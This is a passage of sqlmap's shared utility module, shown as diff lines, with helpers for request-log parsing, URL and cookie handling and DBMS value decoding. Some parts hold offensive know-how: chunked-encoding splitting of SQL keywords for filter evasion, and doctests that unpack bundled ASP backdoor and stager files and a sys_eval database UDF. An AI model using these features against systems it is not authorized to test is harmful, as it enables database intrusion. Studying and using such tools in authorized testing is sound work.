"information_schema": # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5192 + retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) + + return retVal + +def unsafeSQLIdentificatorNaming(name): + """ + Extracts identificator's name from its safe SQL representation + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.MSSQL + >>> getText(unsafeSQLIdentificatorNaming("[begin]")) + 'begin' + >>> getText(unsafeSQLIdentificatorNaming("foobar")) + 'foobar' + >>> kb.forceDbms = popValue() + """ + + retVal = name + + if isinstance(name, six.string_types): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): + retVal = name.replace("`", "") + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO): + retVal = name.replace("\"", "") + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL): + retVal = name.replace("\"", "").upper() + elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + retVal = name.replace("[", "").replace("]", "") + + if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "", retVal) + + return retVal + +def isNoneValue(value): + """ + Returns whether the value is unusable (None or '') + + >>> isNoneValue(None) + True + >>> isNoneValue('None') + True + >>> isNoneValue('') + True + >>> isNoneValue([]) + True + >>> isNoneValue([2]) + False + """ + + if isinstance(value, six.string_types): + return value in ("None", "") + elif isListLike(value): + return all(isNoneValue(_) for _ in value) + elif isinstance(value, dict): + return not any(value) + else: + return value is None + +def isNullValue(value): + """ + Returns whether the value contains explicit 'NULL' value + + >>> isNullValue(u'NULL') + True + >>> isNullValue(u'foobar') + False + """ + + return hasattr(value, "upper") and value.upper() == NULL + +def expandMnemonics(mnemonics, parser, args): + """ + Expands mnemonic options + """ + + class MnemonicNode(object): + def __init__(self): + self.next = {} + self.current = [] + + head = MnemonicNode() + pointer = None + + for group in parser.option_groups: + for option in group.option_list: + for opt in option._long_opts + option._short_opts: + pointer = head + + for char in opt: + if char == "-": + continue + elif char not in pointer.next: + pointer.next[char] = MnemonicNode() + + pointer = pointer.next[char] + pointer.current.append(option) + + for mnemonic in (mnemonics or "").split(','): + found = None + name = mnemonic.split('=')[0].replace('-', "").strip() + value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None + pointer = head + + for char in name: + if char in pointer.next: + pointer = pointer.next[char] + else: + pointer = None + break + + if pointer in (None, head): + errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name + raise SqlmapSyntaxException(errMsg) + + elif len(pointer.current) > 1: + options = {} + + for option in pointer.current: + for opt in option._long_opts + option._short_opts: + opt = opt.strip('-') + if opt.startswith(name): + options[opt] = option + + if not options: + warnMsg = "mnemonic '%s' can't be resolved" % name + logger.warning(warnMsg) + elif name in options: + found = name + debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) + logger.debug(debugMsg) + else: + found = sorted(options.keys(), key=len)[0] + warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options)) + warnMsg += "Resolved to shortest of those ('%s')" % found + logger.warning(warnMsg) + + if found: + found = options[found] + else: + found = pointer.current[0] + debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) + logger.debug(debugMsg) + + if found: + try: + value = found.convert_value(found, value) + except OptionValueError: + value = None + + if value is not None: + setattr(args, found.dest, value) + elif not found.type: # boolean + setattr(args, found.dest, True) + else: + errMsg = "mnemonic '%s' requires value of type '%s'" % (name, found.type) + raise SqlmapSyntaxException(errMsg) + +def safeCSValue(value): + """ + Returns value safe for CSV dumping + + # Reference: http://tools.ietf.org/html/rfc4180 + + >>> safeCSValue('foo, bar') + '"foo, bar"' + >>> safeCSValue('foobar') + 'foobar' + """ + + retVal = value + + if retVal and isinstance(retVal, six.string_types): + if not (retVal[0] == retVal[-1] == '"'): + if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')): + retVal = '"%s"' % retVal.replace('"', '""') + + return retVal + +def filterPairValues(values): + """ + Returns only list-like values with length 2 + + >>> filterPairValues([[1, 2], [3], 1, [4, 5]]) + [[1, 2], [4, 5]] + """ + + retVal = [] + + if not isNoneValue(values) and hasattr(values, '__iter__'): + retVal = [value for value in values if isinstance(value, (tuple, list, set)) and len(value) == 2] + + return retVal + +def randomizeParameterValue(value): + """ + Randomize a parameter value based on occurrences of alphanumeric characters + + >>> random.seed(0) + >>> randomizeParameterValue('foobar') + 'fupgpy' + >>> randomizeParameterValue('17') + '36' + """ + + retVal = value + + value = re.sub(r"%[0-9a-fA-F]{2}", "", value) + + for match in re.finditer(r"[A-Z]+", value): + while True: + original = match.group() + candidate = randomStr(len(match.group())).upper() + if original != candidate: + break + + retVal = retVal.replace(original, candidate) + + for match in re.finditer(r"[a-z]+", value): + while True: + original = match.group() + candidate = randomStr(len(match.group())).lower() + if original != candidate: + break + + retVal = retVal.replace(original, candidate) + + for match in re.finditer(r"[0-9]+", value): + while True: + original = match.group() + candidate = str(randomInt(len(match.group()))) + if original != candidate: + break + + retVal = retVal.replace(original, candidate) + + if re.match(r"\A[^@]+@.+\.[a-z]+\Z", value): + parts = retVal.split('.') + parts[-1] = random.sample(RANDOMIZATION_TLDS, 1)[0] + retVal = '.'.join(parts) + + if not retVal: + retVal = randomStr(lowercase=True) + + return retVal + +@cachedmethod +def asciifyUrl(url, forceQuote=False): + """ + Attempts to make a unicode URL usable with ``urllib/urllib2``. + + More specifically, it attempts to convert the unicode object ``url``, + which is meant to represent a IRI, to an unicode object that, + containing only ASCII characters, is a valid URI. This involves: + + * IDNA/Puny-encoding the domain name. + * UTF8-quoting the path and querystring parts. + + See also RFC 3987. + + # Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/ + + >>> asciifyUrl(u'http://www.\\u0161u\\u0107uraj.com') + 'http://www.xn--uuraj-gxa24d.com' + """ + + parts = _urllib.parse.urlsplit(url) + if not all((parts.scheme, parts.netloc, parts.hostname)): + # apparently not an url + return getText(url) + + if all(char in string.printable for char in url): + return getText(url) + + hostname = parts.hostname + + if isinstance(hostname, six.binary_type): + hostname = getUnicode(hostname) + + # idna-encode domain + try: + hostname = hostname.encode("idna") + except: + hostname = hostname.encode("punycode") + + # UTF8-quote the other parts. We check each part individually if + # if needs to be quoted - that should catch some additional user + # errors, say for example an umlaut in the username even though + # the path *is* already quoted. + def quote(s, safe): + s = s or '' + # Triggers on non-ascii characters - another option would be: + # _urllib.parse.quote(s.replace('%', '')) != s.replace('%', '') + # which would trigger on all %-characters, e.g. "&". + if getUnicode(s).encode("ascii", "replace") != s or forceQuote: + s = _urllib.parse.quote(getBytes(s), safe=safe) + return s + + username = quote(parts.username, '') + password = quote(parts.password, safe='') + path = quote(parts.path, safe='/') + query = quote(parts.query, safe="&=") + + # put everything back together + netloc = getText(hostname) + if username or password: + netloc = '@' + netloc + if password: + netloc = ':' + password + netloc + netloc = username + netloc + + try: + port = parts.port + except: + port = None + + if port: + netloc += ':' + str(port) + + return getText(_urllib.parse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) or url) + +def isAdminFromPrivileges(privileges): + """ + Inspects privileges to see if those are coming from an admin user + """ + + privileges = privileges or [] + + # In PostgreSQL the usesuper privilege means that the + # user is DBA + retVal = (Backend.isDbms(DBMS.PGSQL) and "super" in privileges) + + # In Oracle the DBA privilege means that the + # user is DBA + retVal |= (Backend.isDbms(DBMS.ORACLE) and "DBA" in privileges) + + # In MySQL >= 5.0 the SUPER privilege means + # that the user is DBA + retVal |= (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and "SUPER" in privileges) + + # In MySQL < 5.0 the super_priv privilege means + # that the user is DBA + retVal |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and "super_priv" in privileges) + + # In Firebird there is no specific privilege that means + # that the user is DBA + retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE"))) + + return retVal + +def findPageForms(content, url, raiseException=False, addToTargets=False): + """ + Parses given page content for possible forms (Note: still not implemented for Python3) + + >>> findPageForms('
', 'http://www.site.com') == set([('http://www.site.com/input.php', 'POST', 'id=1', None, None)]) + True + """ + + class _(six.StringIO, object): + def __init__(self, content, url): + super(_, self).__init__(content) + self._url = url + + def geturl(self): + return self._url + + if not content: + errMsg = "can't parse forms as the page content appears to be blank" + if raiseException: + raise SqlmapGenericException(errMsg) + else: + logger.debug(errMsg) + + forms = None + retVal = set() + response = _(content, url) + + try: + forms = ParseResponse(response, backwards_compat=False) + except ParseError: + if re.search(r"(?i)>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target.com/images/page2.php') + True + >>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target2.com/images/page2.php') + False + """ + + if not urls: + return None + elif len(urls) == 1: + return True + else: + def _(value): + if value and not re.search(r"\A\w+://", value): + value = "http://%s" % value + return value + + return all(re.sub(r"(?i)\Awww\.", "", _urllib.parse.urlparse(_(url) or "").netloc.split(':')[0]) == re.sub(r"(?i)\Awww\.", "", _urllib.parse.urlparse(_(urls[0]) or "").netloc.split(':')[0]) for url in urls[1:]) + +def getHostHeader(url): + """ + Returns proper Host header value for a given target URL + + >>> getHostHeader('http://www.target.com/vuln.php?id=1') + 'www.target.com' + """ + + retVal = url + + if url: + retVal = _urllib.parse.urlparse(url).netloc + + if re.search(r"http(s)?://\[.+\]", url, re.I): + retVal = extractRegexResult(r"http(s)?://\[(?P.+)\]", url) + elif any(retVal.endswith(':%d' % _) for _ in (80, 443)): + retVal = retVal.split(':')[0] + + if retVal and retVal.count(':') > 1 and not any(_ in retVal for _ in ('[', ']')): + retVal = "[%s]" % retVal + + return retVal + +def checkOldOptions(args): + """ + Checks for obsolete/deprecated options + """ + + for _ in args: + _ = _.split('=')[0].strip() + if _ in OBSOLETE_OPTIONS: + errMsg = "switch/option '%s' is obsolete" % _ + if OBSOLETE_OPTIONS[_]: + errMsg += " (hint: %s)" % OBSOLETE_OPTIONS[_] + raise SqlmapSyntaxException(errMsg) + elif _ in DEPRECATED_OPTIONS: + warnMsg = "switch/option '%s' is deprecated" % _ + if DEPRECATED_OPTIONS[_]: + warnMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] + logger.warning(warnMsg) + +def checkSystemEncoding(): + """ + Checks for problematic encodings + """ + + if sys.getdefaultencoding() == "cp720": + try: + codecs.lookup("cp720") + except LookupError: + errMsg = "there is a known Python issue (#1616979) related " + errMsg += "to support for charset 'cp720'. Please visit " + errMsg += "'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' " + errMsg += "and follow the instructions to be able to fix it" + logger.critical(errMsg) + + warnMsg = "temporary switching to charset 'cp1256'" + logger.warning(warnMsg) + + _reload_module(sys) + sys.setdefaultencoding("cp1256") + +def evaluateCode(code, variables=None): + """ + Executes given python code given in a string form + + >>> _ = {}; evaluateCode("a = 1; b = 2; c = a", _); _["c"] + 1 + """ + + try: + exec(code, variables) + except KeyboardInterrupt: + raise + except Exception as ex: + errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + +def serializeObject(object_): + """ + Serializes given object + + >>> type(serializeObject([1, 2, 3, ('a', 'b')])) == str + True + """ + + return base64pickle(object_) + +def unserializeObject(value): + """ + Unserializes object from given serialized form + + >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3] + True + >>> unserializeObject('gAJVBmZvb2JhcnEBLg==') + 'foobar' + """ + + return base64unpickle(value) if value else None + +def resetCounter(technique): + """ + Resets query counter for a given technique + """ + + kb.counters[technique] = 0 + +def incrementCounter(technique): + """ + Increments query counter for a given technique + """ + + kb.counters[technique] = getCounter(technique) + 1 + +def getCounter(technique): + """ + Returns query counter for a given technique + + >>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED) + 1 + """ + + return kb.counters.get(technique, 0) + +def applyFunctionRecursively(value, function): + """ + Applies function recursively through list-like structures + + >>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0) + [True, True, [True, True, [True]], False] + """ + + if isListLike(value): + retVal = [applyFunctionRecursively(_, function) for _ in value] + else: + retVal = function(value) + + return retVal + +def decodeDbmsHexValue(value, raw=False): + """ + Returns value decoded from DBMS specific hexadecimal representation + + >>> decodeDbmsHexValue('3132332031') == u'123 1' + True + >>> decodeDbmsHexValue('31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('00310032003300200031') == u'123 1' + True + >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('313233203') == u'123 ?' + True + >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2'] + True + >>> decodeDbmsHexValue('5.1.41') == u'5.1.41' + True + """ + + retVal = value + + def _(value): + retVal = value + if value and isinstance(value, six.string_types): + value = value.strip() + + if len(value) % 2 != 0: + retVal = (decodeHex(value[:-1]) + b'?') if len(value) > 1 else value + singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) + else: + retVal = decodeHex(value) + + if not raw: + if not kb.binaryField: + if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): + try: + retVal = retVal.decode("utf-16-le") + except UnicodeDecodeError: + pass + + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.H2): + try: + retVal = retVal.decode("utf-16-be") + except UnicodeDecodeError: + pass + + if not isinstance(retVal, six.text_type): + retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING) + + if u"\x00" in retVal: + retVal = retVal.replace(u"\x00", u"") + + return retVal + + try: + retVal = applyFunctionRecursively(value, _) + except: + singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) + + return retVal + +def extractExpectedValue(value, expected): + """ + Extracts and returns expected value by a given type + + >>> extractExpectedValue(['1'], EXPECTED.BOOL) + True + >>> extractExpectedValue('1', EXPECTED.INT) + 1 + >>> extractExpectedValue('7\\xb9645', EXPECTED.INT) is None + True + """ + + if expected: + value = unArrayizeValue(value) + + if isNoneValue(value): + value = None + elif expected == EXPECTED.BOOL: + if isinstance(value, int): + value = bool(value) + elif isinstance(value, six.string_types): + value = value.strip().lower() + if value in ("true", "false"): + value = value == "true" + elif value in ('t', 'f'): + value = value == 't' + elif value in ("1", "-1"): + value = True + elif value == '0': + value = False + else: + value = None + elif expected == EXPECTED.INT: + try: + value = int(value) + except: + value = None + + return value + +def hashDBWrite(key, value, serialize=False): + """ + Helper function for writing session data to HashDB + """ + + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + conf.hashDB.write(_, value, serialize) + +def hashDBRetrieve(key, unserialize=False, checkConf=False): + """ + Helper function for restoring session data from HashDB + """ + + retVal = None + + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None + + if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, six.string_types) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): + retVal = None + + return retVal + +def resetCookieJar(cookieJar): + """ + Cleans cookies from a given cookie jar + """ + + if not conf.loadCookies: + cookieJar.clear() + else: + try: + if not cookieJar.filename: + infoMsg = "loading cookies from '%s'" % conf.loadCookies + logger.info(infoMsg) + + content = readCachedFileContent(conf.loadCookies) + content = re.sub("(?im)^#httpOnly_", "", content) + lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#')) + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR) + os.close(handle) + + # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html + with openFile(filename, "w+b") as f: + f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES) + for line in lines: + _ = line.split("\t") + if len(_) == 7: + _[4] = FORCE_COOKIE_EXPIRATION_TIME + f.write("\n%s" % "\t".join(_)) + + cookieJar.filename = filename + + cookieJar.load(cookieJar.filename, ignore_expires=True) + + for cookie in cookieJar: + if getattr(cookie, "expires", MAX_INT) < time.time(): + warnMsg = "cookie '%s' has expired" % cookie + singleTimeWarnMessage(warnMsg) + + cookieJar.clear_expired_cookies() + + if not cookieJar._cookies: + errMsg = "no valid cookies found" + raise SqlmapGenericException(errMsg) + + except Exception as ex: + errMsg = "there was a problem loading " + errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", r"\g<1>", getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + +def decloakToTemp(filename): + """ + Decloaks content of a given file to a temporary file with similar name and extension + + NOTE: using in-memory decloak() in docTests because of the "problem" on Windows platform + + >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.asp_")).startswith(b'<%') + True + >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.asp_")).startswith(b'<%') + True + >>> b'sys_eval' in decloak(os.path.join(paths.SQLMAP_UDF_PATH, "postgresql", "linux", "64", "11", "lib_postgresqludf_sys.so_")) + True + """ + + content = decloak(filename) + + parts = os.path.split(filename[:-1])[-1].split('.') + prefix, suffix = parts[0], '.' + parts[-1] + handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) + os.close(handle) + + with openFile(filename, "w+b", encoding=None) as f: + f.write(content) + + return filename + +def prioritySortColumns(columns): + """ + Sorts given column names by length in ascending order while those containing + string 'id' go first + + >>> prioritySortColumns(['password', 'userid', 'name']) + ['userid', 'name', 'password'] + """ + + def _(column): + return column and re.search(r"^id|id$", column, re.I) is not None + + return sorted(sorted(columns, key=len), key=functools.cmp_to_key(lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0)) + +def getRequestHeader(request, name): + """ + Solving an issue with an urllib2 Request header case sensitivity + + # Reference: http://bugs.python.org/issue2275 + + >>> _ = lambda _: _ + >>> _.headers = {"FOO": "BAR"} + >>> _.header_items = lambda: _.headers.items() + >>> getText(getRequestHeader(_, "foo")) + 'BAR' + """ + + retVal = None + + if request and request.headers and name: + _ = name.upper() + retVal = max(getBytes(value if _ == key.upper() else "") for key, value in request.header_items()) or None + + return retVal + +def isNumber(value): + """ + Returns True if the given value is a number-like object + + >>> isNumber(1) + True + >>> isNumber('0') + True + >>> isNumber('foobar') + False + """ + + try: + float(value) + except: + return False + else: + return True + +def zeroDepthSearch(expression, value): + """ + Searches occurrences of value inside expression at 0-depth level + regarding the parentheses + + >>> _ = "SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL"; _[zeroDepthSearch(_, "FROM")[0]:] + 'FROM DUAL' + >>> _ = "a(b; c),d;e"; _[zeroDepthSearch(_, "[;, ]")[0]:] + ',d;e' + """ + + retVal = [] + + depth = 0 + for index in xrange(len(expression)): + if expression[index] == '(': + depth += 1 + elif expression[index] == ')': + depth -= 1 + elif depth == 0: + if value.startswith('[') and value.endswith(']'): + if re.search(value, expression[index:index + 1]): + retVal.append(index) + elif expression[index:index + len(value)] == value: + retVal.append(index) + + return retVal + +def splitFields(fields, delimiter=','): + """ + Returns list of (0-depth) fields splitted by delimiter + + >>> splitFields('foo, bar, max(foo, bar)') + ['foo', 'bar', 'max(foo,bar)'] + """ + + fields = fields.replace("%s " % delimiter, delimiter) + commas = [-1, len(fields)] + commas.extend(zeroDepthSearch(fields, ',')) + commas = sorted(commas) + + return [fields[x + 1:y] for (x, y) in _zip(commas, commas[1:])] + +def pollProcess(process, suppress_errors=False): + """ + Checks for process status (prints . if still running) + """ + + while process: + dataToStdout(".") + time.sleep(1) + + returncode = process.poll() + + if returncode is not None: + if not suppress_errors: + if returncode == 0: + dataToStdout(" done\n") + elif returncode < 0: + dataToStdout(" process terminated by signal %d\n" % returncode) + elif returncode > 0: + dataToStdout(" quit unexpectedly with return code %d\n" % returncode) + + break + +def parseRequestFile(reqFile, checkParams=True): + """ + Parses WebScarab and Burp logs and adds results to the target URL list + + >>> handle, reqFile = tempfile.mkstemp(suffix=".req") + >>> content = b"POST / HTTP/1.0\\nUser-agent: foobar\\nHost: www.example.com\\n\\nid=1\\n" + >>> _ = os.write(handle, content) + >>> os.close(handle) + >>> next(parseRequestFile(reqFile)) == ('http://www.example.com:80/', 'POST', 'id=1', None, (('User-agent', 'foobar'), ('Host', 'www.example.com'))) + True + """ + + def _parseWebScarabLog(content): + """ + Parses WebScarab logs (POST method not supported) + """ + + if WEBSCARAB_SPLITTER not in content: + return + + reqResList = content.split(WEBSCARAB_SPLITTER) + + for request in reqResList: + url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) + method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) + cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) + + if not method or not url: + logger.debug("not a valid WebScarab log data") + continue + + if method.upper() == HTTPMETHOD.POST: + warnMsg = "POST requests from WebScarab logs aren't supported " + warnMsg += "as their body content is stored in separate files. " + warnMsg += "Nevertheless you can use -r to load them individually." + logger.warning(warnMsg) + continue + + if not(conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, method, None, cookie, tuple()) + + def _parseBurpLog(content): + """ + Parses Burp logs + """ + + if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): + if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + reqResList = [] + for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + port, request = match.groups() + try: + request = decodeBase64(request, binary=False) + except (binascii.Error, TypeError): + continue + _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) + if _: + host = _.group(0).strip() + if not re.search(r":\d+\Z", host): + request = request.replace(host, "%s:%d" % (host, int(port))) + reqResList.append(request) + else: + reqResList = [content] + else: + reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) + + for match in reqResList: + request = match if isinstance(match, six.string_types) else match.group(1) + request = re.sub(r"\A[^\w]+", "", request) + schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) + + if schemePort: + scheme = schemePort.group(1) + port = schemePort.group(2) + request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) + else: + scheme, port = None, None + + if "HTTP/" not in request: + continue + + if re.search(r"^[\n]*%s[^?]*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): + if not re.search(r"^[\n]*%s[^\n]*\*[^\n]*\sHTTP\/" % HTTPMETHOD.GET, request, re.I | re.M): + continue + + getPostReq = False + forceBody = False + url = None + host = None + method = None + data = None + cookie = None + params = False + newline = None + lines = request.split('\n') + headers = [] + + for index in xrange(len(lines)): + line = lines[index] + + if not line.strip() and index == len(lines) - 1: + break + + line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line) + + newline = "\r\n" if line.endswith('\r') else '\n' + line = line.strip('\r') + match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None + + if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None: + data = "" + params = True + + elif match: + method = match.group(1) + url = match.group(2) + + if any(_ in line for _ in ('?', '=', kb.customInjectionMark)): + params = True + + getPostReq = True + + # POST parameters + elif data is not None and params: + data += "%s%s" % (line, newline) + + # GET parameters + elif "?" in line and "=" in line and ": " not in line: + params = True + + # Headers + elif re.search(r"\A\S+:", line): + key, value = line.split(":", 1) + value = value.strip().replace("\r", "").replace("\n", "") + + # Note: overriding values with --headers '...' + match = re.search(r"(?i)\b(%s): ([^\n]*)" % re.escape(key), conf.headers or "") + if match: + key, value = match.groups() + + # Cookie and Host headers + if key.upper() == HTTP_HEADER.COOKIE.upper(): + cookie = value + elif key.upper() == HTTP_HEADER.HOST.upper(): + if '://' in value: + scheme, value = value.split('://')[:2] + + port = extractRegexResult(r":(?P\d+)\Z", value) + if port: + host = value[:-(1 + len(port))] + else: + host = value + + # Avoid to add a static content length header to + # headers and consider the following lines as + # POSTed data + if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): + forceBody = True + params = True + + # Avoid proxy and connection type related headers + elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION, HTTP_HEADER.IF_MODIFIED_SINCE, HTTP_HEADER.IF_NONE_MATCH): + headers.append((getUnicode(key), getUnicode(value))) + + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): + params = True + + data = data.rstrip("\r\n") if data else data + + if getPostReq and (params or cookie or not checkParams): + if not port and hasattr(scheme, "lower") and scheme.lower() == "https": + port = "443" + elif not scheme and port == "443": + scheme = "https" + + if conf.forceSSL: + scheme = "https" + port = port or "443" + + if not host: + errMsg = "invalid format of a request file" + raise SqlmapSyntaxException(errMsg) + + if not url.startswith("http"): + url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) + scheme = None + port = None + + if not(conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, conf.method or method, data, cookie, tuple(headers)) + + content = readCachedFileContent(reqFile) + + if conf.scope: + logger.info("using regular expression '%s' for filtering targets" % conf.scope) + + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + for target in _parseBurpLog(content): + yield target + + for target in _parseWebScarabLog(content): + yield target + +def getSafeExString(ex, encoding=None): + """ + Safe way how to get the proper exception represtation as a string + + >>> getSafeExString(SqlmapBaseException('foobar')) == 'foobar' + True + >>> getSafeExString(OSError(0, 'foobar')) == 'OSError: foobar' + True + """ + + retVal = None + + if getattr(ex, "message", None): + retVal = ex.message + elif getattr(ex, "msg", None): + retVal = ex.msg + elif getattr(ex, "args", None): + for candidate in ex.args[::-1]: + if isinstance(candidate, six.string_types): + retVal = candidate + break + + if retVal is None: + retVal = str(ex) + elif not isinstance(ex, SqlmapBaseException): + retVal = "%s: %s" % (type(ex).__name__, retVal) + + return getUnicode(retVal or "", encoding=encoding).strip() + +def safeVariableNaming(value): + """ + Returns escaped safe-representation of a given variable name that can be used in Python evaluated code + + >>> safeVariableNaming("class.id") == "EVAL_636c6173732e6964" + True + """ + + if value in keyword.kwlist or re.search(r"\A[^a-zA-Z]|[^\w]", value): + value = "%s%s" % (EVALCODE_ENCODED_PREFIX, getUnicode(binascii.hexlify(getBytes(value)))) + + return value + +def unsafeVariableNaming(value): + """ + Returns unescaped safe-representation of a given variable name + + >>> unsafeVariableNaming("EVAL_636c6173732e6964") == "class.id" + True + """ + + if value.startswith(EVALCODE_ENCODED_PREFIX): + value = decodeHex(value[len(EVALCODE_ENCODED_PREFIX):], binary=False) + + return value + +def firstNotNone(*args): + """ + Returns first not-None value from a given list of arguments + + >>> firstNotNone(None, None, 1, 2, 3) + 1 + """ + + retVal = None + + for _ in args: + if _ is not None: + retVal = _ + break + + return retVal + +def removePostHintPrefix(value): + """ + Remove POST hint prefix from a given value (name) + + >>> removePostHintPrefix("JSON id") + 'id' + >>> removePostHintPrefix("id") + 'id' + """ + + return re.sub(r"\A(%s) " % '|'.join(re.escape(__) for __ in getPublicTypeMembers(POST_HINT, onlyValues=True)), "", value) + +def chunkSplitPostData(data): + """ + Convert POST data to chunked transfer-encoded data (Note: splitting done by SQL keywords) + + >>> random.seed(0) + >>> chunkSplitPostData("SELECT username,password FROM users") + '5;4Xe90\\r\\nSELEC\\r\\n3;irWlc\\r\\nT u\\r\\n1;eT4zO\\r\\ns\\r\\n5;YB4hM\\r\\nernam\\r\\n9;2pUD8\\r\\ne,passwor\\r\\n3;mp07y\\r\\nd F\\r\\n5;8RKXi\\r\\nROM u\\r\\n4;MvMhO\\r\\nsers\\r\\n0\\r\\n\\r\\n' + """ + + length = len(data) + retVal = "" + index = 0 + + while index < length: + chunkSize = randomInt(1) + + if index + chunkSize >= length: + chunkSize = length - index + + salt = randomStr(5, alphabet=string.ascii_letters + string.digits) + + while chunkSize: + candidate = data[index:index + chunkSize] + + if re.search(r"\b%s\b" % '|'.join(HTTP_CHUNKED_SPLIT_KEYWORDS), candidate, re.I): + chunkSize -= 1 + else: + break + + index += chunkSize + retVal += "%x;%s\r\n" % (chunkSize, salt) + retVal += "%s\r\n" % candidate + + retVal += "0\r\n\r\n" + + return retVal + +def checkSums(): + """ + Validate the content of the digest file (i.e. sha256sums.txt) + >>> checkSums() + True + """ + + retVal = True + + if paths.get("DIGEST_FILE"): + for entry in getFileItems(paths.DIGEST_FILE): + match = re.search(r"([0-9a-f]+)\s+([^\s]+)", entry) + if match: + expected, filename = match.groups() + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, filename).replace('/', os.path.sep) + checkFile(filepath) + with open(filepath, "rb") as f: + content = 